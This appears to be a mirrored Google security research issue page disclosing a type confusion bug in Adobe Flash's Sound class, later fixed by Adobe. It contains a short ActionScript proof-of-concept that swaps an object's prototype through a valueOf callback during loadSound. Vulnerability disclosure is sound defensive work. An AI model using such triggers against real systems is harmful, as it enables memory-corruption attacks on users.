search

magicislab / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Type Confusion in Sound class #262

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago 
There is a type confusion issue in the Sound class (for all methods). The this 
object's type is checked, but then valueOf in another parameter in the method 
is called, and can change the type of the object before the pointer is actually 
cast to a native sound object.

The code for this issue does not compile, so the POC was created by compiling 
similar code and altering the SWF. But conceptually, the code for the issue is 
as follows:

    function mysubclass(a){

        super();
        var s = super;
        function func(){

            trace(s);
            super(0);
            return 10;
            }

            var n = {test: "hello"};
            n.valueOf = func;
            var f = this.loadSound;
            this.__proto__={};
            this.__proto__.__constructor__ =  Date;
            f.call(this, n, n);

        } 

A PoC swf is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 13 Feb 2015 at 1:29

Attachments:

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 13 Feb 2015 at 1:30

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 13 Feb 2015 at 5:09

GoogleCodeExporter commented 9 years ago 
Possibly fixed by 
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html ? Mailing 
Adobe to check.

Original comment by cev...@google.com on 26 Mar 2015 at 8:23

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 10 Apr 2015 at 9:36

GoogleCodeExporter commented 9 years ago 
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-06.html

Original comment by cev...@google.com on 14 Apr 2015 at 6:22

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 24 Apr 2015 at 8:36